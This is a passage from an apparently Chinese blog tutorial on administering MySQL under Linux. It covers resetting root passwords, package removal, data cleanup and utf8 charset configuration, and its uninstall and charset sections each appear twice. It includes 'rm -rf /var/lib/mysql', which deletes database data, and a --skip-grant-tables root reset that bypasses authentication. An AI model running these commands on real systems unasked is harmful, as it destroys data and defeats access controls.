mysql> SET PASSWORD FOR 'root'@'localhost' = PASSWORD('newpass');
方法2:用mysqladmin
mysqladmin -u root password "newpass"
如果root已经设置过密码,采用如下方法
mysqladmin -u root password oldpass "newpass"
方法3: 用UPDATE直接编辑user表
mysql -u root
mysql> use mysql;
mysql> UPDATE user SET Password = PASSWORD('newpass') WHERE user = 'root';
mysql> FLUSH PRIVILEGES;
在丢失root密码的时候,可以这样
mysqld_safe --skip-grant-tables&
mysql -u root mysql
mysql> UPDATE user SET password=PASSWORD("new password") WHERE user='root';
mysql> FLUSH PRIVILEGES;
首先查看mysql的版本信息:
#rpm -qa|grep -i mysql
显示:
MySQL-server-4.0.14-0
MySQL-client-4.0.14-0
删除mysql。
rpm -ev MySQL-server-4.0.14-0
rpm -ev MySQL-client-4.0.14-0
如果在卸载mysql-devel出现如下的错误:
[root@localhost f]# rpm -e mysql-4.1.12-3.RHEL4.1
error: Failed dependencies:
libmysqlclient.so.14 is needed by (installed) cyrus-sasl-sql-2.1.19-5.EL4.i386
libmysqlclient.so.14 is needed by (installed) dovecot-0.99.11-2.EL4.1.i386
那么,你需要按倒序来先删除dovecot-0.99.11-2.EL4.1.i386,然后是cyrus-sasl-sql-2.1.19-5.EL4.i386,最后,你可以完全删除mysql-devel,其他的类似。
[root@localhost f]# rpm -e dovecot-0.99.11-2.EL4.1.i386
[root@localhost f]# rpm -e cyrus-sasl-sql-2.1.19-5.EL4.i386
开始卸载
[root@localhost f]# rpm -e mysql-4.1.12-3.RHEL4.1
卸载后/var/lib/mysql中的数据及/etc/my.cnf不会删除,如果确定没用后就手工删除
rm -f /etc/my.cnf
rm -rf /var/lib/mysql
#rpm -qa|grep -i mysql
显示:
MySQL-server-4.0.14-0
MySQL-client-4.0.14-0
删除mysql。
rpm -ev MySQL-server-4.0.14-0
rpm -ev MySQL-client-4.0.14-0
如果在卸载mysql-devel出现如下的错误:
[root@localhost f]# rpm -e mysql-4.1.12-3.RHEL4.1
error: Failed dependencies:
libmysqlclient.so.14 is needed by (installed) cyrus-sasl-sql-2.1.19-5.EL4.i386
libmysqlclient.so.14 is needed by (installed) dovecot-0.99.11-2.EL4.1.i386
那么,你需要按倒序来先删除dovecot-0.99.11-2.EL4.1.i386,然后是cyrus-sasl-sql-2.1.19-5.EL4.i386,最后,你可以完全删除mysql-devel,其他的类似。
[root@localhost f]# rpm -e dovecot-0.99.11-2.EL4.1.i386
[root@localhost f]# rpm -e cyrus-sasl-sql-2.1.19-5.EL4.i386
开始卸载
[root@localhost f]# rpm -e mysql-4.1.12-3.RHEL4.1
卸载后/var/lib/mysql中的数据及/etc/my.cnf不会删除,如果确定没用后就手工删除
rm -f /etc/my.cnf
rm -rf /var/lib/mysql
安装完的MySQL的默认字符集为 latin1 ,为了要将其字符集改为用户所需要的(比如utf8),就必须改其相关的配置文件;由于linux下MySQL的默认安装目录分布在不同的文件下;不像windows一样放在同一目录下,只需修改其中的my.ini文件,重起后就生效了;所以先来看看linux下MySQL的数据库文件、配置文件和命令文件分别在不同的目录 :
1、数据库目录,其所创建的数据库文件都在该目录下
/var/lib/mysql/
2、配置文件 (mysql.server命令及配置文件所在地)
/usr/share/mysql
3、相关命令(如mysql mysqladmin等)
/usr/bin
4、启动脚本(如mysql启动命令)
/etc/rc.d/init.d/
查看默认字符集
#mysql -u root - p
#(输入密码)
mysql> show variables like 'character_set%' ;
+--------------------------+----------------------------+
| Variable_name | Value |
+--------------------------+----------------------------+
| character_set_client | latin1 |
| character_set_connection | latin1 |
| character_set_database | latin1 |
| character_set_filesystem | binary |
| character_set_results | latin1 |
| character_set_server | latin1 |
| character_set_system | utf8 |
| character_sets_dir | /usr/share/mysql/charsets/ |
+--------------------------+----------------------------+
修改字符集 :
1.查找/etc目录下是否有my.cnf文件;
#ls -l | grep my.cnf (在/etc下查找是否有my.cnf文件存在)
2.如果没有就要从/usr/share/mysql,拷贝一个到/etc 下,在/usr/share/mysql目录下有五个后缀为.cnf的文件,分别是 my-huge.cnf my-innodb-heavy-4G.cnf my-large.cnf my-medium.cnf my-small.cnf ;从中随便拷贝一个到/etc目录下并将其改为my.cnf文件,我选择的是my-medium.cnf :
#cp /usr/share/mysql/my-medium.cnf /etc/my.cnf
3.修改my.cnf文件,在该文件中的三个地方加上 default-character-set=utf8([client] [mysqld] [mysql])
#vi /etc/my.cnf
修改如下:(红色为添加部分)
[client]
#password = your_password
port = 3306
socket = /var/lib/mysql/mysql.sock
default-character-set=utf8 (经过验证好像这一步不用设置也可以达到效果)
[mysqld]
port = 3306
socket = /var/lib/mysql/mysql.sock
skip-locking
key_buffer = 16M
max_allowed_packet = 1M
table_cache = 64
sort_buffer_size = 512K
net_buffer_length = 8K
read_buffer_size = 256K
read_rnd_buffer_size = 512K
myisam_sort_buffer_size = 8M
default-character-set=utf8
init_connect='SET NAMES utf8'
[mysql]
no-auto-rehash
default-character-set=utf8
保存退出;
4.重起MySQL服务器,使其设置的内容生效
#/etc/init.d/mysql restart
5. 重新登入mysql;
# mysql -u root - p
#(输入密码)
mysql> show variables like 'character_set%' ;
+--------------------------+----------------------------+
| Variable_name | Value |
+--------------------------+----------------------------+
| character_set_client | utf8 |
| character_set_connection | utf8 |(都生成了utf8,成功了 哈哈哈)
| character_set_database | utf8 |
| character_set_filesystem | binary |
| character_set_results | utf8 |
| character_set_server | utf8 |
| character_set_system | utf8 |
| character_sets_dir | /usr/share/mysql/charsets/ |
+--------------------------+----------------------------+
mysql启动和停止 操作 :
可以通过 #/etc/init.d/mysql [start | stop | restart](实现启动,停止,重启)
也可以通过 #service mysql [start | stop | restart](实现启动,停止,重启)
以上为实践总结,如果有更好的方法请告知谢谢
1、数据库目录,其所创建的数据库文件都在该目录下
/var/lib/mysql/
2、配置文件 (mysql.server命令及配置文件所在地)
/usr/share/mysql
3、相关命令(如mysql mysqladmin等)
/usr/bin
4、启动脚本(如mysql启动命令)
/etc/rc.d/init.d/
查看默认字符集
#mysql -u root - p
#(输入密码)
mysql> show variables like 'character_set%' ;
+--------------------------+----------------------------+
| Variable_name | Value |
+--------------------------+----------------------------+
| character_set_client | latin1 |
| character_set_connection | latin1 |
| character_set_database | latin1 |
| character_set_filesystem | binary |
| character_set_results | latin1 |
| character_set_server | latin1 |
| character_set_system | utf8 |
| character_sets_dir | /usr/share/mysql/charsets/ |
+--------------------------+----------------------------+
修改字符集 :
1.查找/etc目录下是否有my.cnf文件;
#ls -l | grep my.cnf (在/etc下查找是否有my.cnf文件存在)
2.如果没有就要从/usr/share/mysql,拷贝一个到/etc 下,在/usr/share/mysql目录下有五个后缀为.cnf的文件,分别是 my-huge.cnf my-innodb-heavy-4G.cnf my-large.cnf my-medium.cnf my-small.cnf ;从中随便拷贝一个到/etc目录下并将其改为my.cnf文件,我选择的是my-medium.cnf :
#cp /usr/share/mysql/my-medium.cnf /etc/my.cnf
3.修改my.cnf文件,在该文件中的三个地方加上 default-character-set=utf8([client] [mysqld] [mysql])
#vi /etc/my.cnf
修改如下:(红色为添加部分)
[client]
#password = your_password
port = 3306
socket = /var/lib/mysql/mysql.sock
default-character-set=utf8 (经过验证好像这一步不用设置也可以达到效果)
[mysqld]
port = 3306
socket = /var/lib/mysql/mysql.sock
skip-locking
key_buffer = 16M
max_allowed_packet = 1M
table_cache = 64
sort_buffer_size = 512K
net_buffer_length = 8K
read_buffer_size = 256K
read_rnd_buffer_size = 512K
myisam_sort_buffer_size = 8M
default-character-set=utf8
init_connect='SET NAMES utf8'
[mysql]
no-auto-rehash
default-character-set=utf8
保存退出;
4.重起MySQL服务器,使其设置的内容生效
#/etc/init.d/mysql restart
5. 重新登入mysql;
# mysql -u root - p
#(输入密码)
mysql> show variables like 'character_set%' ;
+--------------------------+----------------------------+
| Variable_name | Value |
+--------------------------+----------------------------+
| character_set_client | utf8 |
| character_set_connection | utf8 |(都生成了utf8,成功了 哈哈哈)
| character_set_database | utf8 |
| character_set_filesystem | binary |
| character_set_results | utf8 |
| character_set_server | utf8 |
| character_set_system | utf8 |
| character_sets_dir | /usr/share/mysql/charsets/ |
+--------------------------+----------------------------+
mysql启动和停止 操作 :
可以通过 #/etc/init.d/mysql [start | stop | restart](实现启动,停止,重启)
也可以通过 #service mysql [start | stop | restart](实现启动,停止,重启)
以上为实践总结,如果有更好的方法请告知谢谢
